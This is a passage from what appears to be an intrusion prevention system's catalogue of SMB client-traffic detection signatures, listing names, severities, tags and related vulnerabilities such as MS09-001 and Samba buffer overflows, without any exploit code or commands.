Vulnerability: Windows-Null-Session
Description:
Back to top

SMB-TCP_CHS-Open-AndX-Request

About this situation: Samba Open AndX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Open-Print-File-Request

About this situation: Samba Open Print File request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Open-Request

About this situation: Samba Open request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Open2-Buffer-Overflow-MS09-001-1

About this situation: SMB Open2 Buffer Overflow MS09-001
Context: SMB Client Header Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-01, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-424-4219
Vulnerability: Windows-SMB-Open2-Request-Error-Handling-Memory-Corruption
Description:
Back to top

SMB-TCP_CHS-Open2-Buffer-Overflow-MS09-001-2

About this situation: SMB Open2 Buffer Overflow MS09-001
Context: SMB Client Header Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-01, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-424-4219
Vulnerability: Windows-SMB-Open2-Request-Error-Handling-Memory-Corruption
Description:
Back to top

SMB-TCP_CHS-Possible-Nimda-Eml-Spread

About this situation: Nimda Eml Spread
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: Worm-Nimda
Description:
Back to top

SMB-TCP_CHS-Possible-Nimda-Nws-Spread

About this situation: Nimda Nws Spread
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-631-5211
Vulnerability: Worm-Nimda
Description:
Back to top

SMB-TCP_CHS-Possible-Nimda-Riched20-DLL-Spread

About this situation: Nimda riched20.dll Spread
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: Worm-Nimda
Description:
Back to top

SMB-TCP_CHS-Process-Exit-Request

About this situation: Samba Process Exit request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Query-Information-Disk-Request

About this situation: Samba Query Information Disk request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Query-Information-Request

About this situation: Samba Query Information request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Query-Information2-Request

About this situation: Samba Query Information2 request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Query-Server-Request

About this situation: Samba Query Server request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Read-AndX-Request

About this situation: Samba Read AndX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Read-Bulk-Request

About this situation: Samba Read Bulk request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Read-MPX-Request

About this situation: Samba Read MPX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Read-MPX-Secondary-Request

About this situation: Samba Read MPX Secondary request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Read-Raw-Request

About this situation: Samba Read Raw request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Read-Request

About this situation: Samba Read request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Rename-Request

About this situation: Samba Rename request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Request-Buffer-Overflow

About this situation: Windows SMB Request Buffer Overflow
Context: SMB Client Header Stream
Severity: 2
Tags: Windows XP, Windows NT, Windows 2000, Any Hardware, MS2002, CVE2002, Windows XP not specific, Windows NT not specific, Windows 2000 not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SMB-NetBIOS-Request-Buffer-Overflow
Description:
Back to top

SMB-TCP_CHS-Samba-Long-Password-BO

About this situation: Samba Long Password Buffer Overflow
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, x86, Samba, CVE1999, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: NetBIOS-CS-Samba-Long-Password-BO
Description:
Back to top

SMB-TCP_CHS-Samba-SMB-CIFS-Packet-Assembling-BOF-1

About this situation: Buffer overflow attempt against Samba
Context: SMB Client Header Stream
Severity: 7
Tags: Linux, x86, Samba, CVE2002, CVE2003, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-423-4219
Vulnerability: Samba-SMB-CIFS-Packet-Assembling-BOF
Samba-Nttrans-Buffer-Overflow
Description:
Back to top

SMB-TCP_CHS-Samba-SMB1-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-994-5242
Last changed: sgpkg-ips-994-5242
Vulnerability: Samba-SMB1-Information-Disclosure
Description:
Back to top

SMB-TCP_CHS-Samba-SMB1-Packets-Chaining-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Samba detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-317-4219
Last changed: sgpkg-ips-319-4219
Vulnerability: Samba-SMB1-Packets-Chaining-Memory-Corruption
Description:
Back to top

SMB-TCP_CHS-Samba-smbd-Flags2-Header-Parsing-DOS

About this situation: An attempt to exploit a null pointer dereference vulnerability in Samba detected
Context: SMB Client Header Stream
Severity: 7
Tags: Linux, Any Hardware, Samba, Linux not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-308-4219
Last changed: sgpkg-ips-424-4219
Vulnerability: Samba-smbd-Flags2-Header-Parsing-DOS
Description:
Back to top

SMB-TCP_CHS-Samba-smbd-Session-Setup-AndX-Security-Blob-Length-DOS

About this situation: An attempt to exploit a denial of service vulnerability in Samba detected
Context: SMB Client Header Stream
Severity: 7
Tags: Linux, Any Hardware, Samba, Linux not specific, Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-308-4219
Last changed: sgpkg-ips-308-4219
Vulnerability: Samba-smbd-Session-Setup-AndX-Security-Blob-Length-DOS
Description:
Back to top

SMB-TCP_CHS-Samba-Trans2open-BOF-1

About this situation: Samba trans2open function buffer overflow
Context: SMB Client Header Stream
Severity: 7
Tags: Unix, Any Hardware, Samba, CVE2003, Unix not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-277-4219
Vulnerability: Samba-Trans2open-BOF
Description:
Back to top

SMB-TCP_CHS-Samba-Vfs_Fruit-Module-Adeid_Finderi-Handling-Out-Of-Bounds-Read-And-Write

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1435-5242
Vulnerability: Samba-Vfs_Fruit-Module-Adeid_Finderi-Handling-Out-Of-Bounds-Read-And-Write
Description:
Back to top

SMB-TCP_CHS-Samba-Wild-Card-DoS

About this situation: An attempt to exploit a vulnerability in Samba detected
Context: SMB Client Header Stream
Severity: 7
Tags: Unix, Any Hardware, Samba, CVE2004, Unix not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-640-5211
Vulnerability: Samba-Wild-Card-DoS
Description:
Back to top

SMB-TCP_CHS-Search-Request

About this situation: Samba Search request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Security-Package-AndX-Request

About this situation: Samba Security Package AndX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Seek-Request

About this situation: Samba Seek request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Session-Setup-AndX-Request

About this situation: Samba Session Setup AndX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Set-Information-Request

About this situation: Samba Set Information request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Set-Information2-Request

About this situation: Samba Set Information2 request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Shared-Variable-Fingerprint

About this situation: This fingerprint sets shared variables
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-991-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

SMB-TCP_CHS-SMB-AndX-Chain

About this situation: An SMB AndX chain was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-631-5211
Vulnerability: SMB-AndX-Chain
Description:
Back to top

SMB-TCP_CHS-SMB-Filename-Obfuscation

About this situation: An obfuscated filename was found in a SMB message
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-427-4219
Vulnerability: SMB-Filename-Obfuscation
Description:
Back to top

SMB-TCP_CHS-SMB-Samba-Dot-Slash-Combination-Directory-Traversal

About this situation: Directory traversal attempt against Samba
Context: SMB Client Header Stream
Severity: 2
Tags: Unix, x86, Samba, CVE2004, Unix not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SMB-Samba-Dot-Slash-Combination-Directory-Traversal
Description:
Back to top

SMB-TCP_CHS-SMB-Server-Pool-Overflow-MS10-054

About this situation: An attempt to exploit a memory corruption vulnerability in SMB Server detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-332-4219
Vulnerability: SMB-Pool-Overflow-MS10-054
Description:
Back to top

SMB-TCP_CHS-SMB-Server-Pool-Overflow-MS10-054-2

About this situation: An attempt to exploit a memory corruption vulnerability in SMB Server detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-332-4219
Vulnerability: SMB-Pool-Overflow-MS10-054
Description:
Back to top

SMB-TCP_CHS-SMB2-Cancel-Request

About this situation: SMB version 2 Cancel request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Change-Notify-Request

About this situation: SMB version 2 Change Notify request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Close-Request

About this situation: SMB version 2 Close request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Compounded-Session_Setup-Request

About this situation: SMB version 2 compounded SMB2_SESSION_SETUP request
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1670-5242
Last changed: sgpkg-ips-1670-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Create-Request

About this situation: SMB version 2 Create request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Dialect-Requested

About this situation: An SMB client requested the SMB2 dialect
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-740-5211
Vulnerability: SMB2-Dialect-Requested
Description:
Back to top

SMB-TCP_CHS-SMB2-Echo-Request

About this situation: SMB version 2 Echo request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Flush-Request

About this situation: SMB version 2 Flush request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-IOCTL-Request

About this situation: SMB version 2 IOCTL request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Lock-Request

About this situation: SMB version 2 Lock request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Logoff-Request

About this situation: SMB version 2 Logoff request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Logoff-Request-With-Compounding

About this situation: SMB version 2 SMB2_LOGOFF request with compounding
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1739-5242
Last changed: sgpkg-ips-1739-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Negotiate-Request

About this situation: SMB version 2 Negotiate request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1665-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Negotiate-Session_Setup-Or-Echo-Request-With-Compounding

About this situation: SMB version 2 SMB2_NEGOTIATE, SMB2_SESSION_SETUP or SMB2_ECHO request with compounding
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Oplock-Break-Request

About this situation: SMB version 2 Oplock Break request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Query-Directory-Request

About this situation: SMB version 2 Query Directory request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Query-Info-Request

About this situation: SMB version 2 Query Info request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Read-Request

About this situation: SMB version 2 Read request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Session-Setup-Request

About this situation: SMB version 2 Session Setup request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Set-Info-Request

About this situation: SMB version 2 Set-Info request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Tree-Connect-Request

About this situation: SMB version 2 Tree Connect request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Tree-Connect-Request-With-Compounding

About this situation: SMB version 2 SMB2_TREE_CONNECT request with compounding
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1739-5242
Last changed: sgpkg-ips-1739-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Tree-Disconnect-Request

About this situation: SMB version 2 Tree Disconnect request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB2-Unknown-Request

About this situation: SMB version 2 unknown request was detected
Context: SMB Client Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

SMB-TCP_CHS-SMB2-Write-Request

About this situation: SMB version 2 Write request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1629-5242
Description:
Back to top

SMB-TCP_CHS-SMB3-Negotiate-Chained-Compression-Supported

About this situation: SMB3 Negotiation with the compression chaining flag set to supported
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1339-5242
Last changed: sgpkg-ips-1580-5242
Description:
Back to top

SMB-TCP_CHS-SMB3-Negotiate-Chained-Compression-Unsupported

About this situation: SMB3 Negotiation with the compression chaining flag set to unsupported
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1339-5242
Last changed: sgpkg-ips-1339-5242
Description:
Back to top

SMB-TCP_CHS-Sysvol-Share-Traffic

About this situation: Traffic for the SYSVOL share detected
Context: SMB Client Header Stream
Severity: 1
Tags: Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2003 SP2, Windows 2012, Windows 2008, Windows Vista SP2, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, MS2015-02, CVE2015, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1308-5242
Vulnerability: Group-Policy-Remote-Code-Execution
Description:
Back to top

SMB-TCP_CHS-Trans-Secondary-Request

About this situation: SMB Trans Secondary request
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-302-4219
Last changed: sgpkg-ips-516-5211
Description:
Back to top

SMB-TCP_CHS-Transaction-Buffer-Overflow-MS09-001

About this situation: SMB COM_NT_Transaction Buffer Overflow MS09-001
Context: SMB Client Header Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-01, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-424-4219
Vulnerability: Windows-SMB-Trans-Request-Error-Handling-Memory-Corruption
Description:
Back to top

SMB-TCP_CHS-Transaction-Buffer-Overflow-MS09-001-2

About this situation: SMB COM_NT_Transaction Buffer Overflow MS09-001
Context: SMB Client Header Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-01, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-424-4219
Vulnerability: Windows-SMB-Trans-Request-Error-Handling-Memory-Corruption
Description:
Back to top

SMB-TCP_CHS-Transaction-Command-Nonzero-Reserved-Field

About this situation: An unusual value in an SMB command was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: SMB-Transaction-Command-Nonzero-Reserved-Field
Description:
Back to top

SMB-TCP_CHS-Transaction-Request

About this situation: Samba Transaction request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Transaction-Secondary-Request

About this situation: Samba Transaction request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Transaction2-Request

About this situation: Samba Transaction2 request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Transaction2-Secondary-Request

About this situation: Samba Transaction2 Secondary request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

SMB-TCP_CHS-Tree-Connect-AndX-Request

About this situation: Samba Tree Connect AndX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Tree-Connect-Request

About this situation: Samba Tree Connect request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Tree-Disconnect-Request

About this situation: Samba Tree Disconnect request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Unimplemented-Command-Com-Close-And-Tree-Disc

About this situation: An unimplemented SMB command was detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: SMB-Unimplemented-Command-Com-Close-And-Tree-Disc
Description:
Back to top

SMB-TCP_CHS-Unimplemented-Command-Com-New-File-Size

About this situation: An unimplemented SMB command was detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-429-4219
